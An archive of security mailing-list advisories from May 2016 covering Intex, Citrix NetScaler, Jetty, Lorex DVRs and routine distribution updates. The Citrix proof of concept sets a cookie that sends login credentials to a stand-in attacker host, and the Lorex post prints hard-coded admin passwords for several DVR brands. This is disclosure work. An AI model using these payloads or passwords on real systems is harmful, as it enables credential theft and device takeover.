Multiple Vulnerabilities in Intex Wireless N150 Easy Setup Router

2016-05-30 Thread mohitreload
Intex Wireless N150 Easy Setup Router 
Vulnerabilities 
1.  Overview
Intex Wireless N150 Easy Setup Router, firmware version V5.07.51_en_INX01, 
uses default credentials and is vulnerable to cross-site request forgery, cleartext 
transmission of sensitive information and other attacks.
2.  Vulnerabilities
1.  Credentials Management
2.  Clear text Transmission of Sensitive Information
3.  Auto Complete is enabled
4.  Cross-Site Request Forgery
5.  Improper Neutralization of Input during Web Page Generation
3.  Vulnerabilities Description
The purpose of this paper is to outline the security measures being taken by 
Intex to prevent such attacks in their home routing products, what those 
security measures accomplish, and where they fall short. Following are the 
details of the vulnerabilities that we found during the security assessment.
(1) Credentials Management 
Intex uses a default password of admin for the admin account. A local area 
network attacker can gain privileged access to the web management interface or 
leverage default credentials in remote attacks such as cross-site request 
forgery.
(2) Cleartext Transmission of Sensitive Information
It transmits sensitive or security-critical data in cleartext over a 
communication channel that can be sniffed by unauthorized actors. 
(3) Auto Complete is enabled
The web form contains passwords or other sensitive text fields for which the 
browser auto-complete feature is enabled. Auto-complete stores completed form 
fields and passwords locally in the browser, so that these fields are filled in 
automatically when the user visits the site again.
Sensitive data and passwords can be stolen if the user's system is compromised.
Screenshot: https://www.dropbox.com/s/3hhdyp6iisw1kg6/1.png?dl=0
(4) Cross-Site Request Forgery (CSRF)
The Intex router contains a global cross-site request forgery (CSRF) vulnerability. An 
attacker can perform actions with the same permissions as a victim user, 
provided the victim has an active session and is induced to trigger the 
malicious request. Note that in combination with default credentials, an 
attacker can establish an active session as part of an attack and therefore 
would not require a victim to be logged in.
Screenshot: https://www.dropbox.com/s/rh5b925ua0g66s8/2.png?dl=0
(5) Improper Neutralization of Input during Web Page Generation
The router does not properly sanitize input values. This allows a malicious 
user to inject arbitrary JavaScript. It results in a failure of the web page to 
properly display content and corrupts the administrative interface.
Screenshots: 1. https://www.dropbox.com/s/civcjng1tq0bh9v/3.png?dl=0
2. https://www.dropbox.com/s/civcjng1tq0bh9v/3.png?dl=0
 
4.  Impact:
An attacker can obtain credentials, configuration information and gain complete 
control of affected devices.
5.  Solutions
Until these vulnerabilities are addressed by the company, users should consider 
the following workarounds.
a)  Restrict access and use strong passwords
As a general good security practice, only allow trusted hosts to connect to the 
LAN. Implement strong passwords for WiFi and for the web management interface. 
Strong passwords can help to prevent blind guessing attempts that would 
establish sessions for CSRF attacks. LAN hosts should not browse the Internet 
while the web management interface has an active session in a browser tab.


[CVE-2016-4945] Login Form Hijacking Vulnerability in Citrix NetScaler Gateway

2016-05-30 Thread Daniel Schliebner
 PERSICON Security Advisory
===
  Title: Login Form Hijacking vulnerability
Product: Citrix Netscaler
 Vulnerable Version: 11.0 Build 64.35
  Fixed Version: 11.0 Build 66.11
 CVE-ID: CVE-2016-4945
 Impact: medium
  found: 2015-04-07
 by: Dr. Daniel Schliebner 
 http://www.persicon.com
===

Vendor Description:
---
"Citrix (NASDAQ:CTXS) aims to power a world where people, organizations
and things are securely connected and accessible to make the 
extraordinary possible. Its technology makes the world's apps and 
data secure and easy to access, empowering people to work anywhere 
and at any time. Citrix provides a complete and integrated portfolio 
of Workspace-as-a-Service, application delivery, virtualization, mobility, 
network delivery and file sharing solutions that enables IT to ensure 
critical systems are securely available to users via the cloud or 
on-premise and across any device or platform. With annual revenue 
in 2015 of $3.28 billion, Citrix solutions are in use by more than 
400,000 organizations and over 100 million users globally." 
(https://www.citrix.com/about.html)


Vulnerability Description:
--
The login page of the Citrix Netscaler Gateway web frontend is 
vulnerable to a DOM-based Cross-Site-Scripting (XSS) vulnerability due
to improper sanitization of the content of the "NSC_TMAC" cookie.

The vulnerability is located in the file 
 
 /vpn/js/gateway_login_form_view.js
 
in which the cookie's content is, if set, written to the DOM
via JavaScript. This is done in the following excerpt:

var cookie_action = ns_getcookie("NSC_TMAC"); 
var action_url= '/cgi/login'; 
if (cookie_action) { 
action_url = cookie_action;
UnsetCookie("NSC_TMAC");
}

This vulnerability can be exploited by an unauthorized remote attacker
by forging the destination address of the login form in order to
receive the login credentials of a victim. This can be achieved by, for
example, using another XSS vulnerability on the company's web page.


Proof of concept:
-
Assume this vulnerability resides on https://my-foobar-company.com/vpn/.
Assume further, an attacker is able to set a cookie on a victim's client
via some other attack vector like, e.g., another XSS vulnerability.

The attacker needs to first (e.g. by XSS) execute the following code
on the client:


document.cookie='NSC_TMAC=https://attack.ers/receive/;' + 
 ' domain=.my-foobar-company.com';
window.location.href='https://my-foobar-company.com/vpn/'


As a consequence, the Netscaler Gateway login form has the URL
"https://attack.ers/receive/" as the value in its "action" attribute
and hence a victim will send its credentials to the attacker's
host when submitting the form.


Vulnerable / tested versions:
-
Citrix Netscaler 11.0 Build 65.31
Citrix Netscaler 11.0 Build 64.34


Vendor contact timeline:

2016-04-11: Contacting vendor through sec...@citrix.com 
2015-04-11: Vendor response - issue has now the case ID CASE-6597 
and will be forwarded for feedback 
2016-04-12: Vendor response - issue will be reviewed
2016-04-25: Vendor response - issue will be fixed
2016-05-24: Vendor response - issue is fixed in the upcoming
release on 26th May
2016-05-26: Vendor response - issue is fixed in the upcoming
release at 5pm PDT on 26th May
2016-05-27: Status update - fix released by vendor
2016-05-27: Coordinated release of the security advisory


Solution:
-
Remove the use of the cookie content or sanitize its content properly
before writing it to the DOM.


References
--
[1] http://support.citrix.com/article/CTX213313


URL
---
http://persicon.com/tl_files/advisories/PERSICON-advisory-2016-No-1-citrix.txt


smime.p7s
Description: S/MIME cryptographic signature


[slackware-security] php (SSA:2016-148-03)

2016-05-30 Thread Slackware Security Team

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

[slackware-security]  php (SSA:2016-148-03)

New php packages are available for Slackware 14.0, 14.1, and -current to
fix security issues.


Here are the details from the Slackware 14.1 ChangeLog:
+--+
patches/packages/php-5.6.22-i486-1_slack14.1.txz:  Upgraded.
  This release fixes bugs and security issues.
  For more information, see:
http://php.net/ChangeLog-5.php#5.6.22
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-7456
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5093
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5094
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5096
  (* Security fix *)
+--+


Where to find the new packages:
+-+

Thanks to the friendly folks at the OSU Open Source Lab
(http://osuosl.org) for donating FTP and rsync hosting
to the Slackware project!  :-)

Also see the "Get Slack" section on http://slackware.com for
additional mirror sites near you.

Updated package for Slackware 14.0:
ftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/php-5.6.22-i486-1_slack14.0.txz

Updated package for Slackware x86_64 14.0:
ftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/php-5.6.22-x86_64-1_slack14.0.txz

Updated package for Slackware 14.1:
ftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/php-5.6.22-i486-1_slack14.1.txz

Updated package for Slackware x86_64 14.1:
ftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/php-5.6.22-x86_64-1_slack14.1.txz

Updated package for Slackware -current:
ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/php-5.6.22-i586-1.txz

Updated package for Slackware x86_64 -current:
ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/php-5.6.22-x86_64-1.txz


MD5 signatures:
+-+

Slackware 14.0 package:
32c1de91404285e26621694949522eec  php-5.6.22-i486-1_slack14.0.txz

Slackware x86_64 14.0 package:
83c69b58d5ce8ca939d2814fbb5d58b2  php-5.6.22-x86_64-1_slack14.0.txz

Slackware 14.1 package:
830e6aa4120da72592086c5292a24147  php-5.6.22-i486-1_slack14.1.txz

Slackware x86_64 14.1 package:
13024ab60d13e7a07e29736f170267b2  php-5.6.22-x86_64-1_slack14.1.txz

Slackware -current package:
76e1f1d5eb9324d5aa33068ee85ae895  n/php-5.6.22-i586-1.txz

Slackware x86_64 -current package:
126dacd2be02643c32a815f09ff39f58  n/php-5.6.22-x86_64-1.txz


Installation instructions:
++

Upgrade the package as root:
# upgradepkg php-5.6.22-i486-1_slack14.1.txz

Then, restart Apache httpd:
# /etc/rc.d/rc.httpd stop
# /etc/rc.d/rc.httpd start


+-+

Slackware Linux Security Team
http://slackware.com/gpg-key
secur...@slackware.com

++
| To leave the slackware-security mailing list:  |
++
| Send an email to majord...@slackware.com with this text in the body of |
| the email message: |
||
|   unsubscribe slackware-security   |
||
| You will get a confirmation message back containing instructions to|
| complete the process.  Please do not reply to this email address.  |
++
-BEGIN PGP SIGNATURE-
Version: GnuPG v1

iEYEARECAAYFAldI1LYACgkQakRjwEAQIjMWTACglcf+DOvhWg+gntlkoxBVKbd8
ZZYAn2B/hRIYwxVevnLtsm1emqAQoNiw
=7euT
-END PGP SIGNATURE-


[SECURITY] [DSA 3588-1] symfony security update

2016-05-30 Thread Luciano Bello
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

- -
Debian Security Advisory DSA-3588-1   secur...@debian.org
https://www.debian.org/security/Luciano Bello
May 29, 2016  https://www.debian.org/security/faq
- -

Package: symfony
CVE ID : CVE-2016-1902 CVE-2016-4423

Two vulnerabilities were discovered in Symfony, a PHP framework. 

CVE-2016-1902

Lander Brandt discovered that the class SecureRandom might generate
weak random numbers for cryptographic use under certain settings. If
the functions random_bytes() or openssl_random_pseudo_bytes() are not
available, the output of SecureRandom should not be considered secure.

CVE-2016-4423

Marek Alaksa from Citadelo discovered that it is possible to fill up
the session storage space by submitting nonexistent, large usernames.

For the stable distribution (jessie), these problems have been fixed in
version 2.3.21+dfsg-4+deb8u3.

For the testing distribution (stretch), these problems have been fixed
in version 2.8.6+dfsg-1.

For the unstable distribution (sid), these problems have been fixed in
version 2.8.6+dfsg-1.

We recommend that you upgrade your symfony packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org
-BEGIN PGP SIGNATURE-
Version: GnuPG v1

iQIcBAEBCAAGBQJXSyojAAoJEG7C3vaP/jd0fkgP/Rg3MGnU+HOjA3yyqMpG44ui
pdYS9uxQHpfqrABEu4BxOOBikJmJOFTVbX6LgKRv7RD8ko0GocEfFVdVyIBg4q37
ym1Kue3pLUYG+ZSDZY3AFTDqOPHdEd1VV0g+NSHOfwQUxB5rZcWbknL1JGiyuZBt
vZ6S6t11zEUppBrjlVqFoLZyqaO/6gbOSEl3IYoBJ8nGvpsEb54Hr1xnA0V61BmO
LSsnXumvkljlWxfLmdbv6eFZZPeqcTUSTrhSY8HSG4fk1hZYmD5zCcmj9HwFwpDV
Ix8qIr2dYqDeP1kXt5vgaJnQnYDcFZswz97vgdc+u+JfpwZzzg5YNLzXtyWMLueb
AoTpYkKqyMKt9OYR2LMrR6MApd53SlUMssb6TGBUvrs75fkkInDnn98x7HMOBANf
eCZjsaR42tm0H2ydi1mEI3kC2OswLXoVakAw//jYlRoznocQ2J11SvDWZ3ZIVN9N
V2AhyotQSD67BYiEkt1n1uln3zoHLxf8rMXRKO1A0CT0TQujyvwucXQ9YrMjcvN9
TbjocikONjdvjrCGD7N5jYh6VFFjyLNgj+erXroGGnFWLq38Ao2+R+7ogMIUl4gX
20ygoVwNeo2Bb+vmUiPOGTmh53GpbuTxMQArpT7/647gwZJhb2CtkzMnDxMBoU2x
E4S/jTK1mnD7vScdwaNs
=gJF9
-END PGP SIGNATURE-



[slackware-security] libxml2 (SSA:2016-148-01)

2016-05-30 Thread Slackware Security Team

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

[slackware-security]  libxml2 (SSA:2016-148-01)

New libxml2 packages are available for Slackware 14.0, 14.1, and -current to
fix security issues.


Here are the details from the Slackware 14.1 ChangeLog:
+--+
patches/packages/libxml2-2.9.4-i486-1_slack14.1.txz:  Upgraded.
  This release fixes bugs and security issues:
  Heap-based buffer underreads due to xmlParseName (CVE-2016-4447).
  Format string vulnerability (CVE-2016-4448).
  Inappropriate fetch of entities content (CVE-2016-4449).
  For more information, see:
http://xmlsoft.org/news.html
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4447
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4448
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4449
  (* Security fix *)
+--+


Where to find the new packages:
+-+


Updated package for Slackware 14.0:
ftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/libxml2-2.9.4-i486-1_slack14.0.txz

Updated package for Slackware x86_64 14.0:
ftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/libxml2-2.9.4-x86_64-1_slack14.0.txz

Updated package for Slackware 14.1:
ftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/libxml2-2.9.4-i486-1_slack14.1.txz

Updated package for Slackware x86_64 14.1:
ftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/libxml2-2.9.4-x86_64-1_slack14.1.txz

Updated package for Slackware -current:
ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/l/libxml2-2.9.4-i586-1.txz

Updated package for Slackware x86_64 -current:
ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/l/libxml2-2.9.4-x86_64-1.txz


MD5 signatures:
+-+

Slackware 14.0 package:
c498433ae7d6077a9d5245877aa2c06e  libxml2-2.9.4-i486-1_slack14.0.txz

Slackware x86_64 14.0 package:
c92258a87bb30a6cdce2b5428d640bd5  libxml2-2.9.4-x86_64-1_slack14.0.txz

Slackware 14.1 package:
2b74b913a164a23ad2da10eebf923e46  libxml2-2.9.4-i486-1_slack14.1.txz

Slackware x86_64 14.1 package:
e2dee612c7de77822824e43a61414c2c  libxml2-2.9.4-x86_64-1_slack14.1.txz

Slackware -current package:
98d1ede4a347a49f2ad972ac5339b9e6  l/libxml2-2.9.4-i586-1.txz

Slackware x86_64 -current package:
c2d5721aac77b74d7e47a2a8a372d47a  l/libxml2-2.9.4-x86_64-1.txz


Installation instructions:
++

Upgrade the package as root:
# upgradepkg libxml2-2.9.4-i486-1_slack14.1.txz


+-+

Slackware Linux Security Team
http://slackware.com/gpg-key
secur...@slackware.com

-BEGIN PGP SIGNATURE-
Version: GnuPG v1

iEYEARECAAYFAldI1LMACgkQakRjwEAQIjPx0ACfSSTJx0grXawTvgCiMzuoVRCt
cgUAnAim/k4Iz6fu7GM8Kcb0nTqWFh0z
=GWhy
-END PGP SIGNATURE-


[slackware-security] libxslt (SSA:2016-148-02)

2016-05-30 Thread Slackware Security Team

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

[slackware-security]  libxslt (SSA:2016-148-02)

New libxslt packages are available for Slackware 14.0, 14.1, and -current to
fix a security issue.


Here are the details from the Slackware 14.1 ChangeLog:
+--+
patches/packages/libxslt-1.1.29-i486-1_slack14.1.txz:  Upgraded.
  This release fixes bugs and a security issue:
  Fix for type confusion in preprocessing attributes (Daniel Veillard).
  For more information, see:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7995
  (* Security fix *)
+--+


Where to find the new packages:
+-+


Updated package for Slackware 14.0:
ftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/libxslt-1.1.29-i486-1_slack14.0.txz

Updated package for Slackware x86_64 14.0:
ftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/libxslt-1.1.29-x86_64-1_slack14.0.txz

Updated package for Slackware 14.1:
ftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/libxslt-1.1.29-i486-1_slack14.1.txz

Updated package for Slackware x86_64 14.1:
ftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/libxslt-1.1.29-x86_64-1_slack14.1.txz

Updated package for Slackware -current:
ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/l/libxslt-1.1.29-i586-1.txz

Updated package for Slackware x86_64 -current:
ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/l/libxslt-1.1.29-x86_64-1.txz


MD5 signatures:
+-+

Slackware 14.0 package:
9e81aeb7a44f515dc0d0053395faffea  libxslt-1.1.29-i486-1_slack14.0.txz

Slackware x86_64 14.0 package:
c1186870f78d1c71eed0cb10effd561a  libxslt-1.1.29-x86_64-1_slack14.0.txz

Slackware 14.1 package:
847723b4e9f68c2a2a97869734b4c7c0  libxslt-1.1.29-i486-1_slack14.1.txz

Slackware x86_64 14.1 package:
79eed20e9211c68e94c383e929cc6aa0  libxslt-1.1.29-x86_64-1_slack14.1.txz

Slackware -current package:
40b33089887fe7c5827d6bf901e1cdbf  l/libxslt-1.1.29-i586-1.txz

Slackware x86_64 -current package:
088186d11e38075de6e018f8ae6f7471  l/libxslt-1.1.29-x86_64-1.txz


Installation instructions:
++

Upgrade the package as root:
# upgradepkg libxslt-1.1.29-i486-1_slack14.1.txz


+-+

Slackware Linux Security Team
http://slackware.com/gpg-key
secur...@slackware.com

-BEGIN PGP SIGNATURE-
Version: GnuPG v1

iEYEARECAAYFAldI1LQACgkQakRjwEAQIjNtPACggz5OAEc2gvKlP5Z4WhLEjSbi
BUQAnjGxPxRwaPTRLYq0rALLCaHV+Qpu
=xBqf
-END PGP SIGNATURE-


[oCERT 2016-001] Jetty path sanitization issues

2016-05-30 Thread Daniele Bianco

Description:

Jetty is a Java HTTP (Web) server and Servlet container.

The Jetty path normalization mechanism suffers from an implementation issue
when parsing request URLs. 

The path normalization logic implemented in the PathResource class and
introduced in Jetty versions 9.3.x can be defeated by requesting malicious
URLs containing specific escaped characters.

Leveraging this weakness, a malicious user can gain access to protected
resources (e.g. WEB-INF and META-INF folders and their contents) and defeat
application filters or other security constraints implemented in the
servlet configuration.

A workaround to mitigate the issue, using the 'rewrite' module, can
alternatively be implemented as follows:

  $ java -jar ../start.jar --module=rewrite etc/backslashalias.xml

or 

  $ java -jar ../start.jar --add-to-startd=rewrite
  $ java -jar ../start.jar  etc/backslashalias.xml 

Workaround file backslashalias.xml contents:

  
  http://www.eclipse.org/jetty/configure_9_3.dtd;>
  

  

  .*\\.*
  /
  404

  

  


Affected version:

Jetty >= 9.3.0, <= 9.3.8

Fixed version:

Jetty >= 9.3.9

Credit: vulnerability reported by Simon Zuckerbraun of Trend Micro Zero Day 
Initiative

CVE: CVE-2016-4800

Timeline:

2016-05-03: vulnerability report received
2016-05-06: contacted maintainer
2016-05-11: patch provided by maintainer
2016-05-13: assigned CVE
2016-05-18: reporter confirms patch
2016-05-20: contacted affected vendors
2016-05-30: advisory release

References:
http://www.eclipse.org/jetty/download.html

Permalink:
http://www.ocert.org/advisories/ocert-2016-001.html

--
  Daniele Bianco  Open Source Computer Security Incident Response Team
    http://www.ocert.org

  GPG Key 0x9544A497
  GPG Key fingerprint = 88A7 43F4 F28F 1B9D 6F2D  4AC5 AE75 822E 9544 A497


WebKitGTK+ Security Advisory WSA-2016-0004

2016-05-30 Thread Carlos Alberto Lopez Perez

WebKitGTK+ Security Advisory   WSA-2016-0004


Date reported  : May 30, 2016
Advisory ID: WSA-2016-0004
Advisory URL   : http://webkitgtk.org/security/WSA-2016-0004.html
CVE identifiers: CVE-2016-1854, CVE-2016-1856, CVE-2016-1857,
 CVE-2016-1858, CVE-2016-1859.

Several vulnerabilities were discovered in WebKitGTK+.

CVE-2016-1854
Versions affected: WebKitGTK+ before 2.12.1.
Credit to Anonymous working with Trend Micro's Zero Day Initiative.
WebKit, as used in Apple iOS before 9.3.2, Safari before 9.1.1, and
tvOS before 9.2.1, allows remote attackers to execute arbitrary code
or cause a denial of service (memory corruption) via a crafted web
site, a different vulnerability than CVE-2016-1855, CVE-2016-1856,
and CVE-2016-1857.

CVE-2016-1856
Versions affected: WebKitGTK+ before 2.12.1.
Credit to lokihardt working with Trend Micro's Zero Day Initiative.
WebKit, as used in Apple iOS before 9.3.2, Safari before 9.1.1, and
tvOS before 9.2.1, allows remote attackers to execute arbitrary code
or cause a denial of service (memory corruption) via a crafted web
site, a different vulnerability than CVE-2016-1854, CVE-2016-1855,
and CVE-2016-1857.

CVE-2016-1857
Versions affected: WebKitGTK+ before 2.12.3.
Credit to Jeonghoon Shin@A.D.D and Liang Chen, Zhen Feng, wushi of
KeenLab, Tencent working with Trend Micro's Zero Day Initiative.
WebKit, as used in Apple iOS before 9.3.2, Safari before 9.1.1, and
tvOS before 9.2.1, allows remote attackers to execute arbitrary code
or cause a denial of service (memory corruption) via a crafted web
site, a different vulnerability than CVE-2016-1854, CVE-2016-1855,
and CVE-2016-1856.

CVE-2016-1858
Versions affected: WebKitGTK+ before 2.12.0.
Credit to Anonymous.
WebKit, as used in Apple iOS before 9.3.2, Safari before 9.1.1, and
tvOS before 9.2.1, improperly tracks taint attributes, which allows
remote attackers to obtain sensitive information via a crafted web
site.

CVE-2016-1859
Versions affected: WebKitGTK+ before 2.12.1.
Credit to Liang Chen, wushi of KeenLab, Tencent working with Trend
Micro's Zero Day Initiative.
The WebKit Canvas implementation in Apple iOS before 9.3.2, Safari
before 9.1.1, and tvOS before 9.2.1 allows remote attackers to
execute arbitrary code or cause a denial of service (memory
corruption) via a crafted web site.


We recommend updating to the last stable version of WebKitGTK+. It is
the best way of ensuring that you are running a safe version of
WebKitGTK+. Please check our website for information about the last
stable releases.

Further information about WebKitGTK+ Security Advisories can be found
at: http://webkitgtk.org/security.html

The WebKitGTK+ team,
May 30, 2016



signature.asc
Description: OpenPGP digital signature


[SECURITY] [DSA 3589-1] gdk-pixbuf security update

2016-05-30 Thread Salvatore Bonaccorso
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

- -
Debian Security Advisory DSA-3589-1   secur...@debian.org
https://www.debian.org/security/ Salvatore Bonaccorso
May 30, 2016  https://www.debian.org/security/faq
- -

Package: gdk-pixbuf
CVE ID : CVE-2015-7552 CVE-2015-8875

Several vulnerabilities have been discovered in gdk-pixbuf, a toolkit
for image loading and pixel buffer manipulation. A remote attacker can
take advantage of these flaws to cause a denial-of-service against an
application using gdk-pixbuf (application crash), or potentially, to
execute arbitrary code with the privileges of the user running the
application, if a malformed image is opened.

For the stable distribution (jessie), these problems have been fixed in
version 2.31.1-2+deb8u5.

We recommend that you upgrade your gdk-pixbuf packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org
-BEGIN PGP SIGNATURE-
Version: GnuPG v1

iQIcBAEBCgAGBQJXTIJKAAoJEAVMuPMTQ89EJTMP/0lZOykSdff1w5R2cEb34bmB
WzK7oNsvmehDtH59FHdQjmH/KT7RDtQibeAnLPwfDkqtvix76xVthysvdUdloiIT
5kYLc1M8oXomFEkO5/x6Nsfl/LfG7gZbDPWv8hdiAQNVCz6cFqVCVNZdOTPbIkCJ
jhiCrHYMp0eRs0k7C0OsbWQfIlLlbaXgre1MZiRSUd+lyb6XyvVNPkWZ540MVCaN
2++1QhfopCsx1Ts1ImG8wiPQohXPFCBgfYmGf1pq0KonMTfigNNf8BccchA6fBRv
4ikP0OOVq0+fPYLCVT4COFHEYa24nshdSRsD0hADd5P3zC5rsS6k9j2NgQIYZPPa
p4opW2QAK8dIW/sFdPme7G9+wmhtnini+hHCcoYQsJsXeNU8wc2/HF8X1FjfW0Mz
xQ+1gADG3CllFJZi4x6IhWPxOHufnu156nwu2vxO2oCZde9edSpB86IUKxd/l2Br
Rra2dBkhj9ZcH3sai4Gx5q5S+oeKCvZoRoT+eVyK5uouGvqPY9urmf8yW8bRhyu0
Fa+bp8KdrYQuyWSCa31Y0vS+gH9JXs6hBTbDLmcUcY8RpcCDgTrdPQdrwfOVQlu7
IpOuPff+zlipYo/E236Mzuf6Aww3x7A98DS2XTX2zoS0CuJyrXcI0abIkWJYvWOb
6TaO9/LyDrmvGv753VM2
=F1mf
-END PGP SIGNATURE-



[SECURITY] Lorex ECO DVR Hard coded password

2016-05-30 Thread andrew . hofmans
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

1. ADVISORY INFORMATION
===
Product: Lorex ECO DVR
Vendor URL: https://www.lorextechnology.com/
Type: Hard coded password [CWE-259]
Date found: 2016-05-04
Date published: 2016-05-30
CVE: -

2. CREDITS
==
This vulnerability was discovered and researched by Andrew Hofmans. 
https://www.andrewhofmans.com

3. VERSIONS AFFECTED

Vulnerability successfully tested on Lorex LH162400 DVR firmware 
(V5.2.0-20141008) using Lorex Stratus Client and Lorex ECO Stratus Android app. 
Vulnerability may be present on other DVRs that are able to be accessed via 
Lorex's Stratus Client, and Lorex ECO Stratus Android app. Affected DVRs likely 
include the vendors and versions listed specifically in the code.

4. INTRODUCTION
===
LOREX provides businesses and consumers with professional-grade DIY video 
surveillance systems and plug and play wireless video monitoring solutions.

(from the vendor's homepage)

5. VULNERABILITY DETAILS

Remote access to the device is possible using Lorex's Stratus Client which is 
downloadable from the vendor. User is prompted for IP, username/password, and 
port. DVRs are easily identified on a LAN using normal port scanning and 
enumeration. Default username and password is admin:00 (from the manufacturer's 
manual). On first login the admin user is prompted to change the password. No matter 
what the password is or what it is changed to, the "SuperPassword" grants admin 
access to the device. 

The following Proof-of-Concept is found in plaintext in the [installation 
directory]\new-trunk\js\main.js :

function CheckPassword(){};
$(function(){
    $("#btn_reboot_ok").click(function(){
        var SuperPassword;
        if(gDvr.nMainType == 0x52530003 || (gDvr.nMainType == 0x52530002 && gDvr.nSubType == 0x50100) || (gDvr.nMainType == 0x5253 && gDvr.nSubType == 0x60300)){
            SuperPassword = "130901";
        }else{
            SuperPassword = "070901";
        }
        if(lgCls.version == "SWANN"){
            SuperPassword = "479266";
        }else if(lgCls.version == "PROTECTRON"){
            SuperPassword = "Ab9842";
        }
        if($("#reboot_input").val() == gVar.passwd || $("#reboot_input").val() == SuperPassword){
            MasklayerHide();
            $("#reboot_prompt").css("display","none");
            CheckPassword();
        }
    });  // closing braces added; the advisory's excerpt ends at CheckPassword()
});

6. RISK
===
To successfully exploit this vulnerability an attacker must have remote access 
to the DVR over port 9000. Attacker can use Lorex's Stratus Client and use the 
hardcoded admin password for specific vendor and model.

The vulnerability allows remote attackers full administrative access to the 
device.

7. SOLUTION
===
Prevent remote access to port 9000 at the firewall. Segregate DVR from normal 
LAN to limited access internal LAN segment / VLAN.

8. REPORT TIMELINE
==
2016-05-04: Discovery of the vulnerability
2016-05-05: Informed applicable Vendors
2016-05-05: Submitted vulnerability to US-CERT
2016-05-05: Response from US-CERT informing similar vulnerability was 
previously reported which vendor ignored. No further attempts will be made.
2016-05-16: Response from Swann
2016-05-30: Advisory released

-BEGIN PGP SIGNATURE-
Version: GnuPG v2
-END PGP SIGNATURE-